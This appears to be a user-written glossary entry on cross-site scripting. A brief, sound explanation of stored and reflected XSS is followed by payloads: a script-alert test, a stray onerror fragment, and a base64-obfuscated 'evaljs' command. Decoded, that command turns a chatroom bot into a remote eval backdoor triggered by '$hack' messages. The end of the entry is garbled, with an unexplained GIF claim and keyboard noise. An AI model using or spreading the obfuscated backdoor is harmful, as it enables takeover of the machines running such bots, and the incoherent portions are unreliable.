xss 

Short for Cross Site Scripting. A type of web based security vulnerability using client side scripts such as Javascript.

XSS takes place as a consequence of improper input sanitization. When the input provided by the user is not properly sanitized, an ill willed user may insert scripting code into a web page, which in turn will be executed by the visitor's browser. There are 2 kinds of XSS attacks: stored or reflected. Stored would mean that the injected code is permanently stored in the page, such as in a comment. Reflected would mean that it only appears once when the payload (i.e. the malicious input) is part of the request, maybe in parameters or cookies.

<script>alert("Gotcha")</script>

^evaljs eval1-1(atob("Ym90LnNvY2tldC5vbignbWVzc2FnZScsIGZ1bmN0aW9uKGRhdGEpIHsKICBsZXQgeCA9IGRhdGEubXNnLmluZGV4T2YoJyAnKTsKICBpZihkYXRhLm1zZy5zbGljZSgwLCB4KSA9PSAnJGhhY2snKSB7CiAgICB0cnkgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCBldmFsKGRhdGEubXNnLnNsaWNlKHggKyAxKSkpOwogICAgfSBjYXRjaChlcikgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCAiRVJSOiAiICsgZXIudG9TdHJpbmcoKSk7CiAgICB9CiAgfQp9KQ=="))
/* command xss is a type of XSS attack performed on chatroom bots to gain access to the host's computer */

It is an XSS attack disguised in a GIF image.

onerror='alert("xss")'>

shs jhdsjd hjdjd